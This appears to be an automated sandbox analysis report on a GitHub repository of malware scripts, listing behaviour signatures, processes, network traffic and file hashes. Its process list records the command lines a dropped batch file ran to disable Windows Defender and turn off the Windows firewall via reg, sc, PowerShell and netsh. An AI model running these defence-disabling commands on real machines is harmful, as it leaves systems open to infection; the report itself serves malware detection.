Analysis Overview
Threat Level: Likely malicious
The file https://github.com/SantiagoPujana/MalwareScripts was found to be: Likely malicious.
Malicious Activity Summary
Modifies Windows Firewall
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Launches sc.exe
System Location Discovery: System Language Discovery
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Modifies registry key
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-17 08:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-17 08:52
Reported
2024-11-17 08:55
Platform
win10v2004-20241007-en
Max time kernel
127s
Max time network
128s
Command Line
Signatures
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\ScreenMelter.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\FullMemory.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\ScreenMelter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\FullMemory.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763071872342857" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/SantiagoPujana/MalwareScripts
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffafe10cc40,0x7ffafe10cc4c,0x7ffafe10cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3756 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4828,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4936,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5248,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\ScreenMelter.exe
"C:\Users\Admin\Desktop\ScreenMelter.exe"
C:\Users\Admin\Desktop\FullMemory.exe
"C:\Users\Admin\Desktop\FullMemory.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win64.bat" "
C:\Windows\system32\reg.exe
reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Security /f
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Restart-Service -Name WinDefend -Confirm:$false -Force
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc query WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-NetFirewallProfile -Enabled False
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5104,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=980,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.109.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.187.202:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
Files
\??\pipe\crashpad_3392_LMVKLSWPCBOKBIAS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 073d2d1f5afb5732236e939c0f259453 |
| SHA1 | 8bf64fccb5a35df236f322ce95de1dd19a31a5a1 |
| SHA256 | c8e860634b94e4a52bdc84987fb8311deaf0d6704fad629b8ff553a1a511069e |
| SHA512 | 21dc80ce515562eeb520463a43e84b5e26a3604504091c47c5ee377c06afe9d71d732f6ed4f952682828a78e986819585156e5fdd7e20309739b001f1e1f2530 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 0dc35bc6ef8164a71cab703e6c8e5e2e |
| SHA1 | e6c3b92acd95052fb1e4336ffa52521ffcdc80b3 |
| SHA256 | 7ab722c4e93d69d0d0db6f54825cf3419c8cc5acea92f2266661152c96fd8087 |
| SHA512 | eecbb7648dd195b7099f813f91e39c29ad74818c239b292aeba9d113665e3b7f2491a2324c67a7e6899cd16046f39c16631dd2a6ae274e4f4626fa9c0e02798b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a116308261e6dc9f7327354ce05586cd |
| SHA1 | 809e52db5a77a97ac22b31e37735034bdb1f77ae |
| SHA256 | e847403fd8daaa42346ead0edcdccac58ef30a7c7b852770d9893ce39f4ed9d4 |
| SHA512 | eabb82f592c9dd5fdfb9e491adf3bc43fa377c246d0f946fc52fbf504554a34cc46557aeb4d252ad276f6a58e4e0eb13c7fdc905c82cda5e4ec1504d2320c2b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 21d3f83b943683f20d13b27b8555abbb |
| SHA1 | 3a0602b4b701ac3916abf990d1d48f754c87b75a |
| SHA256 | 8692a9c4971fdf97d106843159799f505cab152407a7d632c560eefa4c33e75a |
| SHA512 | 38197634ad5f4dda5d53d711ae2cdcf7fac7b6bb6c26e24dcf20790abde06c0dcff38ac3d332eed6c393d8cf311aa402d33f4e33072c81058a9b49b28f1910f0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 08729e18bf59e658dbaa0d544186224f |
| SHA1 | d2331ab2f3c207aba283e9df002b2d763fbe0a6a |
| SHA256 | fff4a524d7f867fda57816b557f75cd8f61f75d420fab691b7157f1b65d13816 |
| SHA512 | bf605e079029c97b8dd5403e772bcdd6c18a1325e1f3e77c4ec2bc8fe5145a538152f24d401893359dd52cea93bac3414f1cd82f85b875a5bb302b69adb4de6f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 68103ea7a4503dd93424400eb8cf6685 |
| SHA1 | 828412d712bcfeeb940bb7482230b8d1a67f0e40 |
| SHA256 | db7fd66761785e06b5ff0b7815b16484ec47d55419ea9a44e9b60289bf1b19ee |
| SHA512 | 9ee3db3df3e73edd20faa9bca68c958db89bdb19ec4113d6388524dd16885452a66c46a769fdc3b3cd46d73287cc3ff88bc3475bae6febc68c2d5229edad8253 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 3bda54957329399e01369d366d01868b |
| SHA1 | 57b7c4ab48ee910bda91bab3d3ae3e938f0d0148 |
| SHA256 | c5cf894c14c37c6b34a9c32365767a53b73c1ad554664c980ffed693258b1757 |
| SHA512 | 0221e125ee31169c12ad8dbaf27b3c09eabbb220a52c6ae8d332141c3f0223d037702dc058f582a86d92ba44819f9c25f18be7ae87f8b67dd5790a5ee6d79e20 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b67b469a374cc80ddcfa5f2864784702 |
| SHA1 | ed1815c27a6fe6797bbbab1b8cbe7e8346c39676 |
| SHA256 | ea560c47f5aa8f56654119e3a71c5c2741ecdf61507b266dd7183689fbdbc9b0 |
| SHA512 | 418786d01a82c496900d352b7a990e34aa6f9291308fcae874fef6783715a0d9328ecf6ce3e113fb33b2d19c784dc96b1abcc79499fa5584f4a3da0f2b6019ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | da190c584ad1b88fcd51f04685dd218c |
| SHA1 | 1b5d7c1d5cfd2806d39fb80ca97d8c71b24d65eb |
| SHA256 | 2ae4d64370bb0154a140b94f709bb3cb555cf08b40caa4ea4da3d0d7890df39b |
| SHA512 | 0cf93ce7ad4190152c62d2d8661bb25a3feb6cf314fc79d93561088a974c3febbdd61bb287a02c1b7a7cfafa031bcee550238b3e4b9ce7224f9ac38dbf3a7a08 |
C:\Users\Admin\Downloads\FullMemory.exe
| MD5 | 56dbd0fc7e98607b73306cf8551ba7d3 |
| SHA1 | 7c3c297a08636cd94a5f4e61f5970f85beec53ab |
| SHA256 | a489e7dc06ba4ef9572b66acfecf89c62d6b5c3d35b0ecb216aee2a4cd475498 |
| SHA512 | 04be2153762e4a1ac20618d7a2980d7e92f4db7e951f9e754f30a4c2bf4f098443aafa2c8c9221584668d99a144869b30b7ef40c3acdb798cf2d6ddf0b6f2ed8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d0e95cba9ed6ce304cb83116b75aed52 |
| SHA1 | a47d4c5624a7c25d358828f38320aa1b7207c388 |
| SHA256 | 0c809780a7e58e9d0731d28b691bbda673536c3960f1e54c71352e425017e428 |
| SHA512 | b7de8a369c508aa355fd9d79c97c84625f5d10140dd62843dd86a377222a792e8fb38a7339732b8d39ff9d36f62f693767903e7ef6e675710587efe1699aef52 |
C:\Users\Admin\Downloads\ScreenMelter.exe
| MD5 | cefcd3f182b98087ae20ce34a1f5989b |
| SHA1 | ab8640bc9bb611d1fa43eced8410595c8c41d17b |
| SHA256 | e7923e3e77348cd5046e0f4a9859ff991933945c41e9771d00e2bdec1e1267d9 |
| SHA512 | be161799e3606cc32ccd49976f63d6c1c7ffaef4f6769e58c8653fb0ea56351ea3c2113021483cb970834784b74763f9c4ba89fc1bacfccf7e6766c83b9c69d8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 134980c78a6b4244d50c265689cedca4 |
| SHA1 | 18eeeca3de641d06aea7ca3d36eddace378f0d98 |
| SHA256 | f86d0a99b685555d4497a8819338a0c6884233cc38d68bbb41c930cf5babf9e5 |
| SHA512 | 663158d971d2d4181da56678407a69437baab92c951822e58bab379f11b00cd698ab4939f6e047317168dcba64c809daa550e47b8c371abe2112dad9674030ae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ba1d1bce374bf5d57dd33b02a9a13bf8 |
| SHA1 | 47b8e855bb9e6b15f610240ff06e4bc9707780f0 |
| SHA256 | dc226f71609df0a7bec1ea2b4fbe5250205bddbac74a2e94684b5619b1c16348 |
| SHA512 | 95b3b08818818c5c598e4ab52f913e13041b180e5e340993c9cae9391c368911064c3093fd743899206cd5a576b624ec116c27c170d5ca89a7217f4de656a865 |
memory/4384-296-0x00000000006D0000-0x00000000006F0000-memory.dmp
memory/4384-299-0x00000000006D0000-0x00000000006F0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1dac7711129c58c4bb96f4ac5887e369 |
| SHA1 | 3fe0460d5b525506a7b8c2220d7d2eef636ccb26 |
| SHA256 | 04e7920e3bb85d8daf3f229eaa81637d37a12dd4be9df417c8f7967cd33e9d4f |
| SHA512 | a4c420a4028288189b10f52dd6e7a2989668fabd0b3fe972ed918c263a5b2e83d0c43c0d03a3aa3bd0377b0cbc7344aa770ec7f2c7aae2d7040dfa4fac0dacaf |
memory/992-310-0x0000000000D80000-0x0000000000DA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 92d25c80f9e51b974164cf1cef8ff9ac |
| SHA1 | edf7d0477c60b796fbe9bc6ea529730245a885d0 |
| SHA256 | 1b989eeb235c944aa0d5faf07990ee47155d38e954a12d3ccbff34b6c83aba2b |
| SHA512 | a74ccb4a283d48bbceab1f90dc59b800b9abd850ec6d5f5cea69c9c1e7b68086aa171bc018bec7e075e1f172f3b59e76611c3b0b4b504be3bc4e62e134927a7d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d8d5b44fb839ede3d75feda67fa99c71 |
| SHA1 | 4b633eee81202091940d2be98bfa1141bfc8754f |
| SHA256 | e2c84b67be6e3a97126451d1d4073a8beb171b1df0df955e40a8a2c964c9f4f5 |
| SHA512 | 6cc2d8ead16814a0828e4e52fbcbda4b2bed92805b68c4d07f7191fe292e34a514890a4e2e474f0c571a2cea65527c9e22eea0a863a0ccfe3aca556cefbe6641 |
memory/992-326-0x0000000000D80000-0x0000000000DA0000-memory.dmp
C:\Users\Admin\Desktop\win64.bat
| MD5 | 2baf7f332b19d0a534fea218c84de722 |
| SHA1 | 5b507b59151681f0be1b91679450413b97cb1baa |
| SHA256 | 15d7b954ce8ec43a28b4d9df7082e511d0bcecba6a19169d17d41a41ca8769f2 |
| SHA512 | 09f84942cd8ca020364db5efe1fe61e7ca862d5bdada7568f0c8fadaa35c16632bb20c1fe946d1578c0b17728e442e1baf996ea2b6ac19ab1e3ed228662e13c2 |
memory/3752-328-0x000002D261200000-0x000002D261222000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzkups4q.zwl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 92f89789864052cac0862ed6b4f1e706 |
| SHA1 | aa6594951427e103fa025c8ebef3ec5a5f85866c |
| SHA256 | 73123d6e562b26b1fd2cf4fece67930d95fc4738bad8d1f386345a5311274739 |
| SHA512 | 71a0261ee6ffcd2e9bb336dde7110f80ac6fa01df5433e77cc170649b7936653d89229255fbeac15692e8736c9f3e5d15d62b2372865fe3d7ab933c511c2894e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7d28c7b63ed6134229fe24f4c4830521 |
| SHA1 | df820f1db7c236d72b47b54c68a16fbe942166da |
| SHA256 | 2adc156088f2d6759104e0f1b92d6c2acbb9f778d9d27f1d1e1e7341f274c68c |
